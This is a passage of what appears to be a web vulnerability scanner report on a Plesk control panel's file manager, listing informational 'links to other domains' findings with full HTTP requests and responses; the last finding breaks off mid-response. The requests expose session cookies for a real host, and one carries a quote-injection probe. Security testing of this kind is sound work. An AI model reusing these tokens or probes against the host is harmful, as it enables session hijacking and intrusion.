<td><A href="http://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Ftest%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:11:07 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:11:29 GMT
Connection: close
Content-Length: 46977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/asp" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/aspnet" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/coldfusion" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/perl" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/php" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/python" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.3. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fimg%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:10:51 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:11:01 GMT
Connection: close
Content-Length: 43294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img/apps" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img/common" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img/glyph" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img/icons" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.4. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpsdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:16:50 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:52 GMT
Connection: close
Content-Length: 37543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="https://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.5. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline%2F HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline%2F%27baseline
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:21:12 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:21:13 GMT
Connection: close
Content-Length: 39787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline/&#039;baseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline/baseline-file" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.6. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fcss%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:10:48 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:10:54 GMT
Connection: close
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css/style.css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css/tabs.css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.7. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/create-dir/?cmd=chdir&file=%2Fhttpdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 04:11:51 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:11:57 GMT
Connection: close
Content-Length: 57786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/%5ebaseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/sitebuilder" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline-file" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.8. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/create-dir/?cmd=chdir&file=%2Fhttpsdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:16:56 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:58 GMT
Connection: close
Content-Length: 37752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="https://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.9. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-dir/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/create-dir/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-dir/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:20:50 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:20:52 GMT
Connection: close
Content-Length: 38119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline/baseline-file" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.10. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-file/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/create-file/?cmd=chdir&file=%2Fhttpdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:19:36 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
